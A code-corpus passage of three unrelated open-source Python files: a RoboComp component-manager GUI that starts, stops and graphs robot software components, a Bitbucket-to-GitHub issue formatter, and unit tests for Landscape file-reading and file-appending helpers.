self.button4.setText('edit config')
self.connect(self.button1, QtCore.SIGNAL('clicked()'), self.but1)
self.connect(self.button2, QtCore.SIGNAL('clicked()'), self.but2)
self.connect(self.button3, QtCore.SIGNAL('clicked()'), self.but3)
self.connect(self.button4, QtCore.SIGNAL('clicked()'), self.but4)
self.show()
def but1(self): self.up.emit()
def but2(self): self.down.emit()
def but3(self): self.restart.emit()
def but4(self): self.config.emit()
# ComponentChecker class: Threaded endpoint-pinging class.
class ComponentChecker(threading.Thread):
def __init__(self, endpoint):
threading.Thread.__init__(self)
self.mutex = QtCore.QMutex(QtCore.QMutex.Recursive)
self.daemon = True
self.reset()
self.exit = False
self.alive = False
self.aPrx = None
try:
self.aPrx = global_ic.stringToProxy(endpoint)
self.aPrx.ice_timeout(1)
except:
print ("Error creating proxy to " + endpoint)
if len(endpoint) == 0:
print ('Please, provide an endpoint')
raise
def run(self):
global global_ic
while self.exit == False:
try:
self.aPrx.ice_ping()
self.mutex.lock()
self.alive = True
self.mutex.unlock()
except:
self.mutex.lock()
self.alive = False
self.mutex.unlock()
time.sleep(0.5)
def reset(self):
self.mutex.lock()
self.alive = False
self.mutex.unlock()
def isalive(self):
self.mutex.lock()
r = self.alive
self.mutex.unlock()
return r
def stop(self):
self.exit = True
def runrun(self):
if not self.isAlive(): self.start()
#
# Application main class.
#
class TheThing(QtWidgets.QDialog):
def __init__(self):
# Create a component checker
self.componentChecker = {}
self.configFile = os.path.expanduser('~/rcmanager.xml')
# Gui config
global dict
QtWidgets.QDialog.__init__(self)
self.root = '/opt/robocomp/'
self.ui = Ui_Form()
self.ui.setupUi(self)
self.canvas = GraphView(self.ui.graphTab)
self.canvas.setGeometry(0, 0, 531, 581)
self.canvas.show()
self.canvasTimer = QtCore.QTimer()
self.canvasFastTimer = QtCore.QTimer()
self.connect(self.canvas, QtCore.SIGNAL("nodeReleased()"), self.setFastState)
self.setFastState(True)
self.connect(self.canvasTimer, QtCore.SIGNAL("timeout()"), self.graphUpdate)
self.connect(self.canvasFastTimer, QtCore.SIGNAL("timeout()"), self.graphFastEnds)
if dict['dock'] == 'true':
self.changeDock()
# Variables needed to switch the state of components when double-clicking over them.
self.clickTimes = 0
self.lastClickTime = QtCore.QTime()
self.clickNumber = -1
# Component config containter
self.compConfig = []
# Init component sets
self.back_comps = set()
self.requests = set()
# Icon and system's tray stuff
self.iconOK = QtGui.QIcon(QtGui.QPixmap('/opt/robocomp/share/rcmanager/drawing_red.png'))
self.iconFULL = QtGui.QIcon(QtGui.QPixmap('/opt/robocomp/share/rcmanager/drawing_green.png'))
self.iconChange1 = QtGui.QIcon(QtGui.QPixmap('/opt/robocomp/share/rcmanager/drawing_right.png'))
self.iconChange2 = QtGui.QIcon(QtGui.QPixmap('/opt/robocomp/share/rcmanager/drawing_left.png'))
self.setWindowIcon(self.iconOK)
self.state = 0
self.doExit = False
self.systray = None
self.blinkTimer = QtCore.QTimer()
self.doDock = False
# Set the fixed timeout for component checking
self.timer = QtCore.QTimer()
self.timer.start(dict['fixed'])
self.menu = QtWidgets.QMenuBar(None)
self.ui.verticalLayout_3.insertWidget(0, self.menu)
self.menuFile = self.menu.addMenu('File')
self.menuSim = self.menu.addMenu('Simulation')
self.menuActions = self.menu.addMenu('Actions')
self.actionKillAll = self.menuActions.addAction('kill all')
self.connect(self.actionKillAll, QtCore.SIGNAL("triggered(bool)"), self.killall)
#self.actionRunAll = self.menuActions.addAction('run all')
#self.connect(self.actionRunAll, QtCore.SIGNAL("triggered(bool)"), self.runall)
self.actionOpen = self.menuFile.addAction('Open')
self.connect(self.actionOpen, QtCore.SIGNAL("triggered(bool)"), self.openFile)
self.actionSave = self.menuFile.addAction('Save')
self.connect(self.actionSave, QtCore.SIGNAL("triggered(bool)"), self.saveFile)
self.actionEdit = self.menuFile.addAction('Edit')
self.connect(self.actionEdit, QtCore.SIGNAL("triggered(bool)"), self.runEditor)
self.actionDock = self.menuFile.addAction('Dock')
self.connect(self.actionDock, QtCore.SIGNAL("triggered(bool)"), self.changeDock)
self.actionExit = self.menuFile.addAction('Exit')
self.connect(self.actionExit, QtCore.SIGNAL("triggered(bool)"), self.forceExit)
# Do we want the eye-candy graph simulation?
if (dict['active'] == "true"):
self.doSimulation = True
else:
self.doSimulation = False
if self.doSimulation == True:
self.actionSS = self.menuSim.addAction('Stop')
else:
self.actionSS = self.menuSim.addAction('Start')
# Set connections
self.connect(self.ui.checkList, QtCore.SIGNAL("itemClicked(QListWidgetItem *)"), self.selectCheck)
self.connect(self.ui.upButton, QtCore.SIGNAL("clicked()"), self.up)
self.connect(self.ui.downButton, QtCore.SIGNAL("clicked()"), self.down)
# self.connect(self.ui.restartButton, QtCore.SIGNAL("clicked()"), self.restart)
self.connect(self.ui.tabWidget, QtCore.SIGNAL("currentChanged(int)"), self.tabChanged)
self.connect(self.timer, QtCore.SIGNAL("timeout()"), self.checkAll)
self.connect(self.canvas, QtCore.SIGNAL('upRequest()'), self.manageGraphUp)
self.connect(self.canvas, QtCore.SIGNAL('downRequest()'), self.manageGraphDown)
self.connect(self.canvas, QtCore.SIGNAL('restartRequest()'), self.manageGraphRestart)
self.connect(self.canvas, QtCore.SIGNAL('configRequest()'), self.manageGraphConfig)
self.connect(self.actionSS, QtCore.SIGNAL("triggered(bool)"), self.sSimulation)
# Draw the graph
self.canvas.update()
# Get settings
try:
settings = QtCore.QSettings("RoboComp", "rcmanager")
value = QtCore.QByteArray(settings.value("geometry"))
if value != None:
self.restoreGeometry(value)
value = int(settings.value("page"))
if value != None:
self.ui.tabWidget.setCurrentIndex(value)
value = bool(settings.value("docking"))
if value != None:
if value == True:
self.changeDock()
except:
print("Could not read preferred settings")
# Select a new rcmanager configuration file
def openFile(self, path=None):
if path is None or path is False:
self.configFile = QtGui.QFileDialog.getOpenFileName(self, "Select file", '', "*.xml")[0]
else:
self.configFile = path
if len(self.configFile) > 0:
if self.canvas.ui != None: self.canvas.ui.close()
self.readConfig()
else:
print ('len(cfgFile) == 0')
# Save the current configuration to a new file
def saveFile(self):
global dict
if self.canvas.ui != None: self.canvas.ui.close()
s = QtGui.QFileDialog.getSaveFileName (self, "Select output file",'', "*.xml")
if len(s) > 0 and len(s[0])>0:
for c1 in self.compConfig:
for c2 in self.canvas.compList:
if c1.alias == c2.name:
c1.x = c2.x
c1.y = c2.y
c1.r = c2.r
rcmanagerConfigSimple.writeConfigToFile(dict, self.compConfig, s[0])
# Dock icon blinking method.
def changeDock(self):
global dict
if self.canvas.ui != None: self.canvas.ui.close()
if self.doDock == False:
self.systray = QtWidgets.QSystemTrayIcon(self)
self.systray.setIcon(self.iconOK)
self.systray.setVisible(True)
self.connect(self.systray, QtCore.SIGNAL("activated (QSystemTrayIcon::ActivationReason)"), self.toggle)
self.connect(self.blinkTimer, QtCore.SIGNAL("timeout()"), self.changeIcon)
self.iconNumber = 0
self.doDock = True
dict['dock'] = 'true'
self.actionDock.setText('Undock')
else:
self.systray.deleteLater()
self.disconnect(self.blinkTimer, QtCore.SIGNAL("timeout()"), self.changeIcon)
self.iconNumber = 0
self.doDock = False
dict['dock'] = 'false'
self.actionDock.setText('Dock')
# Stop graph simulation if its running or vice versa.
def sSimulation(self):
global dict
self.doSimulation = not self.doSimulation
if self.doSimulation == False:
self.actionSS.setText('Start')
if self.fastState == False:
self.canvasTimer.start(dict['focustime'])
dict['active'] = 'false'
else:
self.actionSS.setText('Stop')
self.setFastState()
if self.fastState == False:
self.canvasTimer.start(dict['idletime'])
dict['active'] = 'true'
# When doing simulation calling this method will make the simulation go fast
def setFastState(self, fast=True):
global dict
self.fastState = fast
if fast:
self.canvasTimer.start(dict['fasttime'])
self.canvasFastTimer.start(dict['fastperiod'])
else:
self.canvasFastTimer.stop()
if self.ui.tabWidget.currentIndex() == 1 and self.doSimulation == True:
self.canvasTimer.start(dict['focustime'])
else:
self.canvasTimer.start(dict['idletime'])
# Opposite of the previous method
def graphFastEnds(self):
self.setFastState(False)
# Run component simulator
def runEditor(self):
if self.canvas.ui != None: self.canvas.ui.close()
self.editor = rcmanagerEditor.rcmanagerEditorWidget()
self.editor.setModal(True)
self.editor.show()
self.editor.readConfig(self.configFile)
self.connect(self.editor, QtCore.SIGNAL('finished()'), self.readConfig)
# Add the ui-selected component to the requests set by calling the 'up()' method.
def manageGraphUp(self):
for idx in range(self.ui.checkList.count()):
if self.ui.checkList.item(idx).text() == self.canvas.request:
self.ui.checkList.setCurrentRow(idx)
self.selectCheck()
self.up()
break
# Add the ui-selected component to the down set by calling the 'down()' method.
def manageGraphDown(self):
for idx in range(self.ui.checkList.count()):
if self.ui.checkList.item(idx).text() == self.canvas.request:
self.ui.checkList.setCurrentRow(idx)
self.selectCheck()
self.down()
break
def manageGraphRestart(self):
for idx in range(self.ui.checkList.count()):
if self.ui.checkList.item(idx).text() == self.canvas.request:
self.ui.checkList.setCurrentRow(idx)
self.selectCheck()
self.down()
self.up()
break
# Edit a component's configuration
def manageGraphConfig(self):
for idx in range(self.ui.checkList.count()):
if self.ui.checkList.item(idx).text() == self.canvas.request:
self.ui.checkList.setCurrentRow(idx)
self.selectCheck()
self.config()
break
# Update the UI graph
def graphUpdate(self):
global dict
self.canvas.checkForNewComponents(self)
self.canvas.center()
if self.doSimulation:
self.canvas.step(self)
self.canvas.update()
# Current tab changed
@QtCore.Slot("int")
def tabChanged(self, num):
if self.fastState == False:
if num == 0: self.canvasTimer.start(dict['idletime'])
elif num == 1 and self.doSimulation == True: self.canvasTimer.start(dict['focustime'])
# Retuns True if the specified component is up, otherwise returns False
def itsUp(self, compNumber):
if self.compConfig[compNumber].alias in self.componentChecker:
return self.componentChecker[self.compConfig[compNumber]].isalive()
return False
# Queues the user's request to change the state of a given component, turning it off if it's on and viceversa.
def switchComponent(self, compNumber):
if self.itsUp(compNumber) == True: self.down()
else: self.up()
# Queues the user request to turn on a component
def up(self):
itsconfig = self.compConfig[self.ui.checkList.currentRow()]
self.requests = self.requests | set([itsconfig.alias])
self.clearFocus()
# Queues the user request to turn on a component
def up_by_name(self, name):
for idx in range(self.ui.checkList.count()):
if self.ui.checkList.item(idx).text() == name:
self.ui.checkList.setCurrentRow(idx)
self.selectCheck()
self.up()
break
# Queues the user request to turn off a component
def down(self):
self.bg_exec(str(self.ui.downEdit.text()), self.ui.wdEdit.text())
self.clearFocus()
def killall(self):
for info in self.compConfig:
self.bg_exec(str(info.compdown), str(info.workingdir))
def restart(self):
self.request = self.compList[self.ui.idx].name
self.ui.close()
self.emit(QtCore.SIGNAL("restartRequest()"))
# Run the configured file editor
def config(self):
global dict
self.bg_exec(self.compConfig[self.ui.checkList.currentRow()].configFile, self.ui.wdEdit.text())
self.clearFocus()
# Reads new configuration from file
def readConfig(self):
self.canvas.initialize()
self.ui.checkList.clear()
self.compConfig = []
self.back_comps = set()
self.requests = set()
newList, newDict = rcmanagerConfigSimple.getConfigFromFile(self.configFile)
for k, v in newDict.items():
dict[k] = v
self.componentChecker.clear()
for listItem in newList:
item = QtWidgets.QListWidgetItem()
item.setText(listItem.alias)
self.ui.checkList.insertItem(0, item)
self.compConfig.insert(0, listItem)
self.componentChecker[listItem.alias] = ComponentChecker(listItem.endpoint)
self.componentChecker[listItem.alias].runrun()
self.log('Configuration loaded')
n = rcmanagerConfigSimple.unconnectedGroups(newList)
if n > 1:
msg = 'WARNING: ' + str(n) + ' unconnected component groups'
self.log(msg)
QtWidgets.QMessageBox.warning(self, 'Warning', msg)
self.setFastState()
# Call-back when
#
def selectCheck(self):
# Check if it's a consecutive click
notTheLastOneAtTime = 0
if self.clickNumber != self.ui.checkList.currentRow():
notTheLastOneAtTime = 1
if self.lastClickTime.elapsed() > dict['interval']:
notTheLastOneAtTime = 1
if notTheLastOneAtTime == 0: # It's not
self.clickTimes = self.clickTimes + 1
else: # It is
self.clickTimes = 1
self.clickNumber = self.ui.checkList.currentRow()
self.lastClickTime = self.lastClickTime.currentTime()
# If it's a N-ary click: swap its state
if self.clickTimes >= dict['switch']:
self.switchComponent(self.clickNumber)
# Show information of the last clicked component
info = self.compConfig[self.ui.checkList.currentRow()]
self.ui.checkEdit.setText(info.endpoint)
self.ui.wdEdit.setText(info.workingdir)
self.ui.upEdit.setText(info.compup)
self.ui.downEdit.setText(info.compdown)
self.ui.cfgEdit.setText(info.configFile)
def checkAll(self, initial=False):
allOk = True
workingComponents = set()
for numItem in range(0, len(self.compConfig)):
ok = True
itemConfig = self.compConfig[numItem]
item = self.ui.checkList.item(numItem)
if (itemConfig.alias in self.componentChecker) and (self.componentChecker[itemConfig.alias].isalive()):
item.setForeground(QtGui.QColor(0, 255, 0))
workingComponents.add(itemConfig.alias)
else:
item.setForeground(QtGui.QColor(255, 0, 0))
allOk = False
if workingComponents != self.back_comps:
if allOk == False:
self.blinkTimer.stop()
self.blinkTimer.start(dict['blink'])
for comp in workingComponents.difference(self.back_comps):
self.log('Now \"' + comp + '\" is up.')
for comp in self.back_comps.difference(workingComponents):
self.log('Now \"' + comp + '\" is down.')
if self.wantsDocking():
if allOk and len(self.compConfig) > 0:
self.systray.setIcon(self.iconFULL)
elif workingComponents != self.back_comps:
self.systray.setIcon(self.iconOK)
self.back_comps = workingComponents.copy()
self.upRequests()
def upRequests(self):
future_requests = self.requests
for alias in self.requests:
itsconfig = self.getConfigByAlias(alias)
unavailableDependences = []
for dep in itsconfig.dependences:
if (not dep in self.componentChecker) or (not self.componentChecker[dep].isalive()):
unavailableDependences.append(dep)
if len(unavailableDependences) == 0:
print ('rcmanager:', alias, 'is now ready to run.')
self.upConfig(itsconfig)
future_requests = future_requests - set([alias])
else:
print ('rcmanager:', alias, 'has unavailable dependences:', unavailableDependences)
future_requests = future_requests | set(unavailableDependences)
self.requests = future_requests
# Tries to execute a component
def upConfig(self, conf):
self.bg_exec(conf.compup, conf.workingdir)
# Executes a command in the background
def bg_exec(self, command, workDir):
# Get command argument list
argument_list = command.split(' ')
# Set program as argument_list[0]
program = argument_list[0]
# Set args as argument_list[1, -1]
args = argument_list[1:]
currentWorkDir = os.getcwd()
os.chdir(workDir)
proc = QtCore.QProcess()
print ('\nQProcess::startDetached( ' + program + ' , ' + str(args) + ' ) @ ' + os.getcwd() + '\n')
proc.startDetached(program, args)
os.chdir(currentWorkDir)
#
# Changes the icon of the program properly, skipping if docking is not active
def changeIcon(self):
if self.isActiveWindow() == True:
self.blinkTimer.stop()
self.systray.setIcon(self.iconOK)
else:
if self.iconNumber == 0:
self.systray.setIcon(self.iconChange1)
self.iconNumber = 1
elif self.iconNumber == 1:
self.systray.setIcon(self.iconChange2)
self.iconNumber = 2
else:
self.systray.setIcon(self.iconChange1)
self.iconNumber = 1
#
# (Un)hide the main window
def toggle(self):
if self.isVisible(): self.hide()
else: self.show()
#
# Manages close events
def closeEvent(self, closeevent):
settings = QtCore.QSettings("RoboComp", "rcmanager");
g = self.saveGeometry()
settings.setValue("geometry", g)
settings.setValue("page", self.ui.tabWidget.currentIndex())
settings.setValue("docking", self.wantsDocking())
if self.doExit != 1 and self.doDock == True:
closeevent.ignore()
self.hide()
elif self.wantsDocking():
closeevent.accept()
for key, checker in self.componentChecker.iteritems():
checker.stop()
# else:
# closeevent.accept()
# self.forceExit()
# sys.exit(0)
#
# Forces the program to exit
def forceExit(self):
self.doExit = 1
self.close()
#
# Clears the interface selection when the user presses 'Esc'
def keyPressEvent(self, keyevent):
if keyevent.key() == 16777216:#0x01000000
self.ui.checkList.clearSelection()
if self.canvas.ui != None: self.canvas.ui.close()
#
# Interface stuff:
def uiChange(self):
self.ui.checkList.setCurrentRow(0)
self.selectCheck()
self.clearFocus()
def clearFocus(self):
self.ui.checkList.clearSelection()
def log(self, text):
self.ui.outputText.append(' * ' + QtCore.QTime.currentTime().toString() + ': ' + text)
def getConfigByAlias(self, alias):
for config in self.compConfig:
if config.alias == alias:
return config
return None
#
# Return 1 if docking is selected, 0 otherwise.
def wantsDocking(self):
if self.doDock == True: return 1
else: return 0
def resizeEvent(self, e):
old = e.oldSize()
new = e.size()
inc = new - old
if (inc.width != 0 or inc.height!=0):
self.canvas.resize(self.canvas.size()+inc)
e.accept()
class GraphNode:
def __init__(self):
self.name = ''
self.color = None
self.htmlcolor = None
self.deps = []
self.on = False
self.x = 0.
self.y = 0.
self.r = 10.
self.vel_x = 0.
self.vel_y = 0.
class GraphView(QtWidgets.QWidget):
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.tab = parent
self.initialize()
def initialize(self):
global dict
self.compList = []
self.VisualNodeCogia = None
self.ox = 0
self.oy = 0
self.ui = None
#self.hookes_constant = dict['hookes']
self.spring_length = dict['springlength']
self.roza = 1.-dict['friction']
self.time_elapsed2 = dict['step']**2
self.field_force_multiplier = dict['fieldforce']
self.hookes_constant = dict['hookes']
def nodes(self):
if self.VisualNodeCogia:
return self.compList + list(self.VisualNodeCogia)
else:
return self.compList
def checkForNewComponents(self, parent):
# Check for components added to the configuration
anyone = False
for parentComp in parent.compConfig:
notFound = True
if self.VisualNodeCogia:
if self.VisualNodeCogia.name == parentComp.alias:
if self.VisualNodeCogia.name in parent.componentChecker:
notFound = False
self.VisualNodeCogia.on = parent.componentChecker[self.VisualNodeCogia.name].isalive()
break
if notFound:
for myComp in self.compList:
if myComp.name == parentComp.alias:
notFound = False
myComp.on = parent.componentChecker[myComp.name].isalive()
break
if notFound:
newOne = GraphNode()
newOne.color = parentComp.color
newOne.htmlcolor = parentComp.htmlcolor
newOne.name = parentComp.alias
newOne.deps = parentComp.dependences
newOne.x = float(parentComp.x)
newOne.y = float(parentComp.y)
newOne.r = float(parentComp.r)
self.compList.append(newOne)
anyone = True
#if anyone == True: self.step(self)
def step(self, parent):
#
# Compute velocities
for iterr in self.compList:
force_x = force_y = 0.
for iterr2 in self.compList:
if iterr.name == iterr2.name: continue
ix = iterr.x - iterr2.x
iy = iterr.y - iterr2.y
while ix == 0 and iy == 0:
iterr.x = iterr.x + random.uniform( -10, 10)
iterr2.x = iterr2.x + random.uniform(-10, 10)
iterr.y = iterr.y + random.uniform( -10, 10)
iterr2.y = iterr2.y + random.uniform(-10, 10)
ix = iterr.x - iterr2.x
iy = iterr.y - iterr2.y
angle = math.atan2(iy, ix)
dist2 = ((abs((iy*iy) + (ix*ix))) ** 0.5) ** 2.
if dist2 < self.spring_length: dist2 = self.spring_length
force = self.field_force_multiplier / dist2
force_x += force * math.cos(angle)
force_y += force * math.sin(angle)
for iterr2 in self.compList:
if iterr2.name in iterr.deps or iterr.name in iterr2.deps:
ix = iterr.x - iterr2.x
iy = iterr.y - iterr2.y
angle = math.atan2(iy, ix)
force = math.sqrt(abs((iy*iy) + (ix*ix))) # force means distance actually
#if force <= self.spring_length: continue # "
force -= self.spring_length # force means spring strain now
force = force * self.hookes_constant # now force means force :-)
force_x -= force*math.cos(angle)
force_y -= force*math.sin(angle)
iterr.vel_x = (iterr.vel_x + (force_x*self.time_elapsed2))*self.roza
iterr.vel_y = (iterr.vel_y + (force_y*self.time_elapsed2))*self.roza
# Update positions
for iterr in self.compList:
iterr.x += iterr.vel_x
iterr.y += iterr.vel_y
def center(self):
total = 0
totalx = 0.
totaly = 0.
for iterr in self.compList:
totalx += iterr.x
totaly += iterr.y
total += 1
if self.VisualNodeCogia:
totalx += self.VisualNodeCogia.x
totaly += self.VisualNodeCogia.y
total += 1
if abs(totalx) > 0.001:
meanx = totalx / total
for iterr in self.compList:
iterr.x -= meanx
if self.VisualNodeCogia:
self.VisualNodeCogia.x -= meanx
if abs(totaly) > 0.001:
meany = totaly / total
for iterr in self.compList:
iterr.y -= meany
if self.VisualNodeCogia:
self.VisualNodeCogia.y -= meany
def paintNode(self, node):
w2 = self.parent().width()/2
h2 = self.parent().height()/2+30
global dict
if node.on:
self.painter.setBrush(QtGui.QColor(0, 255, 0, dict['alpha']))
self.painter.setPen(QtGui.QColor(0, 255, 0))
else:
self.painter.setBrush(QtGui.QColor(255, 0, 0, dict['alpha']))
self.painter.setPen(QtGui.QColor(255, 0, 0))
self.painter.drawEllipse(node.x-node.r+w2, node.y-node.r+h2, node.r*2, node.r*2)
self.painter.drawText(QtCore.QPoint(node.x-node.r+w2, node.y-node.r-3+h2), node.name)
if node.color != None:
self.painter.setBrush(node.color)
self.painter.setPen(node.color)
self.painter.drawEllipse(node.x-node.r/4+w2, node.y-node.r/4+h2, node.r/2, node.r/2)
def paintEvent(self, event):
w2 = self.tab.width()/2
h2 = self.tab.height()/2+30
nodosAPintar = [] + self.compList
if self.VisualNodeCogia: nodosAPintar.append(self.VisualNodeCogia)
self.painter = QtGui.QPainter(self)
self.painter.setRenderHint(QtGui.QPainter.Antialiasing, True)
for i in nodosAPintar:
xo = i.x
yo = i.y
for j in nodosAPintar:
if j.name in i.deps:
angle = 180.-(math.atan2(yo-j.y, xo-j.x)*(57.2957795))
xinc = j.x - i.x
yinc = j.y - i.y
mag = ( xinc**2. + yinc**2. )**0.5
if mag == 0: continue
xshift = (xinc/mag)
yshift = (yinc/mag)
xinit = i.x+xshift*i.r
yinit = i.y+yshift*i.r
xend = xinit+((mag-i.r-j.r)*math.cos(angle*(math.pi/180.)))
yend = yinit-((mag-i.r-j.r)*math.sin(angle*(math.pi/180.)))
self.painter.setPen(QtGui.QColor(0, 0, 255, 150))
self.painter.drawLine(xinit+w2, yinit+h2, xend+w2, yend+h2)
self.painter.setBrush(QtGui.QColor(0, 0, 255, 200))
#-j.r-(xshift/i.r)*j.r,
#-j.r-(yshift/i.r)*j.r
px = j.x-10-xshift*j.r
py = j.y-10-yshift*j.r
self.painter.drawPie(px+w2, py+h2, 20, 20, abs((angle+180-16)*16), 32*16)
self.painter.setFont(QtGui.QFont("Arial", 13));
for i in self.compList:
self.paintNode(i)
if self.VisualNodeCogia:
self.paintNode(self.VisualNodeCogia)
self.painter = None
def mousePressEvent(self, e):
self.showNodeMenu(e)
def mouseDoubleClickEvent(self, e):
self.showNodeMenu(e, True)
def showNodeMenu(self, e, forceDialog=False):
w2 = self.parent().width()/2
h2 = self.parent().height()/2 + 30
x = e.x()-w2
y = e.y()-h2
if self.ui: self.ui.close()
VisualNode = None
minDist = -1.
minIndex = 0
for b in self.compList:
bx = b.x
by = b.y
dist = ( (bx-x)**2 + (by-y)**2 )**0.5
if dist < b.r:
if dist < minDist or minDist == -1.:
VisualNode = b
minDist = dist
minIndex = self.compList.index(b)
self.ox = x - b.x
self.oy = y - b.y
if VisualNode:
if e.button() == 2 or forceDialog:
self.ui = CommandDialog(self, self.compList[minIndex].x+w2, self.compList[minIndex].y+h2)
self.ui.idx = minIndex
self.connect(self.ui, QtCore.SIGNAL('up()'), self.up)
self.connect(self.ui, QtCore.SIGNAL('down()'), self.down)
self.connect(self.ui, QtCore.SIGNAL('restart()'), self.restart)
self.connect(self.ui, QtCore.SIGNAL('config()'), self.config)
self.ui.show()
elif e.button() == 1:
self.VisualNodeCogia = self.compList.pop(minIndex)
self.repaint()
def mouseReleaseEvent(self, e):
if self.VisualNodeCogia != None:
self.compList.append(self.VisualNodeCogia)
self.VisualNodeCogia = None
self.emit(QtCore.SIGNAL("nodeReleased()"))
def mouseMoveEvent(self, e):
w2 = self.parent().width()/2
h2 = self.parent().height()/2+30
self.repaint()
if self.VisualNodeCogia != None:
self.VisualNodeCogia.x = e.x()-self.ox-w2
self.VisualNodeCogia.y = e.y()-self.oy-h2
self.repaint()
def up(self):
self.request = self.compList[self.ui.idx].name
self.ui.close()
self.emit(QtCore.SIGNAL("upRequest()"))
def down(self):
self.request = self.compList[self.ui.idx].name
self.ui.close()
self.emit(QtCore.SIGNAL("downRequest()"))
def restart(self):
self.request = self.compList[self.ui.idx].name
self.ui.close()
self.emit(QtCore.SIGNAL("restartRequest()"))
def config(self):
self.request = self.compList[self.ui.idx].name
self.emit(QtCore.SIGNAL("configRequest()"))
self.ui.close()
#
# Create the Qt application, the class, and runs the program
#
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
window = TheThing()
parser = argparse.ArgumentParser()
parser.add_argument('input_file')
parser.add_argument('-u', "--up", dest='up')
parser.add_argument('--hide', action='store_true')
args = parser.parse_args()
if args.input_file:
window.openFile(args.input_file)
else:
print('input file needed to start rcmanager')
if args.up:
window.up_by_name(args.up)
ret = -1
if not args.hide:
window.show()
try:
ret = app.exec_()
except:
print('Some error happened.')
sys.exit()
| Kmayankkr/robocomp | tools/rcmanagerSimple/rcmanagersimple.py | Python | gpl-3.0 | 30,207 |
ISSUE = """\
- Bitbucket: https://bitbucket.org/{repo}/issue/{id}
- Originally reported by: {user}
- Originally created at: {created_on}
{body}
"""
COMMENT = """Original comment by {user}
{body}"""
def format_user(user_data, usermap):
if user_data is None:
return "Anonymous"
assert isinstance(user_data, dict), user_data
username = user_data.get('username')
mapped = usermap.get(username)
if mapped not in (None, False):
return '@' + (mapped if isinstance(mapped, str) else username)
if username is not None:
return '[{0}](http://bitbucket.org/{0})'.format(
username
)
def format_body(issue, repo, usermap):
content = clean_body(issue['content'], usermap)
return ISSUE.format(
body=content,
repo=repo,
id=issue['local_id'],
user=format_user(issue.get('reported_by'), usermap),
created_on=issue['created_on'],
)
def format_comment(comment, usermap):
return COMMENT.format(**comment)
def clean_body(body, usermap):
lines = []
in_block = False
for line in body.splitlines():
if line.startswith("{{{") or line.startswith("}}}"):
if "{{{" in line:
before, part, after = line.partition("{{{")
lines.append(' ' + after)
in_block = True
if "}}}" in line:
before, part, after = line.partition("}}}")
lines.append(' ' + before)
in_block = False
else:
if in_block:
lines.append(" " + line)
else:
lines.append(line.replace("{{{", "`").replace("}}}", "`"))
return "\n".join(lines)
| RonnyPfannschmidt/bitbucket_issue_migration | src/migrate_to_github/formating.py | Python | gpl-3.0 | 1,727 |
# -*- coding: utf-8 -*-
import codecs
import os
from mock import patch
import time
import unittest
from twisted.python.compat import long
from landscape.lib import testing
from landscape.lib.fs import append_text_file, append_binary_file, touch_file
from landscape.lib.fs import read_text_file, read_binary_file
class BaseTestCase(testing.FSTestCase, unittest.TestCase):
pass
class ReadFileTest(BaseTestCase):
def test_read_binary_file(self):
"""
With no options L{read_binary_file} reads the whole file passed as
argument.
"""
path = self.makeFile("foo")
self.assertEqual(read_binary_file(path), b"foo")
def test_read_binary_file_with_limit(self):
"""
With a positive limit L{read_binary_file} reads up to L{limit} bytes
from the start of the file.
"""
path = self.makeFile("foo bar")
self.assertEqual(read_binary_file(path, limit=3), b"foo")
def test_read_binary_file_with_negative_limit(self):
"""
With a negative limit L{read_binary_file} reads only the tail of the
file.
"""
path = self.makeFile("foo bar from end")
self.assertEqual(read_binary_file(path, limit=-3), b"end")
def test_read_binary_file_with_limit_bigger_than_file(self):
"""
If the limit is bigger than the file L{read_binary_file} reads the
entire file.
"""
path = self.makeFile("foo bar from end")
self.assertEqual(
read_binary_file(path, limit=100), b"foo bar from end")
self.assertEqual(
read_binary_file(path, limit=-100), b"foo bar from end")
def test_read_text_file(self):
"""
With no options L{read_text_file} reads the whole file passed as
argument as string decoded with utf-8.
"""
utf8_content = codecs.encode(u"foo \N{SNOWMAN}", "utf-8")
path = self.makeFile(utf8_content, mode="wb")
self.assertEqual(read_text_file(path), u"foo ☃")
def test_read_text_file_with_limit(self):
"""
With a positive limit L{read_text_file} returns up to L{limit}
characters from the start of the file.
"""
utf8_content = codecs.encode(u"foo \N{SNOWMAN}", "utf-8")
path = self.makeFile(utf8_content, mode="wb")
self.assertEqual(read_text_file(path, limit=3), u"foo")
def test_read_text_file_with_negative_limit(self):
"""
With a negative limit L{read_text_file} reads only the tail characters
of the string.
"""
utf8_content = codecs.encode(u"foo \N{SNOWMAN} bar", "utf-8")
path = self.makeFile(utf8_content, mode="wb")
self.assertEqual(read_text_file(path, limit=-5), u"☃ bar")
def test_read_text_file_with_limit_bigger_than_file(self):
"""
If the limit is bigger than the file L{read_text_file} reads the entire
file.
"""
utf8_content = codecs.encode(u"foo \N{SNOWMAN} bar", "utf-8")
path = self.makeFile(utf8_content, mode="wb")
self.assertEqual(read_text_file(path, limit=100), u"foo ☃ bar")
self.assertEqual(read_text_file(path, limit=-100), u"foo ☃ bar")
def test_read_text_file_with_broken_utf8(self):
"""
A text file containing broken UTF-8 shouldn't cause an error, just
return some sensible replacement chars.
"""
not_quite_utf8_content = b'foo \xca\xff bar'
path = self.makeFile(not_quite_utf8_content, mode='wb')
self.assertEqual(read_text_file(path), u'foo \ufffd\ufffd bar')
self.assertEqual(read_text_file(path, limit=5), u'foo \ufffd')
self.assertEqual(read_text_file(path, limit=-3), u'bar')
class TouchFileTest(BaseTestCase):
@patch("os.utime")
def test_touch_file(self, utime_mock):
"""
The L{touch_file} function touches a file, setting its last
modification time.
"""
path = self.makeFile()
touch_file(path)
utime_mock.assert_called_once_with(path, None)
self.assertFileContent(path, b"")
def test_touch_file_multiple_times(self):
"""
The L{touch_file} function can be called multiple times.
"""
path = self.makeFile()
touch_file(path)
touch_file(path)
self.assertFileContent(path, b"")
def test_touch_file_with_offset_seconds(self):
"""
The L{touch_file} function can be called with a offset in seconds that
will be reflected in the access and modification times of the file.
"""
path = self.makeFile()
current_time = long(time.time())
expected_time = current_time - 1
with patch.object(
time, "time", return_value=current_time) as time_mock:
with patch.object(os, "utime") as utime_mock:
touch_file(path, offset_seconds=-1)
time_mock.assert_called_once_with()
utime_mock.assert_called_once_with(
path, (expected_time, expected_time))
self.assertFileContent(path, b"")
class AppendFileTest(BaseTestCase):
def test_append_existing_text_file(self):
"""
The L{append_text_file} function appends contents to an existing file.
"""
existing_file = self.makeFile("foo bar")
append_text_file(existing_file, u" baz ☃")
self.assertFileContent(existing_file, b"foo bar baz \xe2\x98\x83")
def test_append_text_no_file(self):
"""
The L{append_text_file} function creates a new file if one doesn't
exist already.
"""
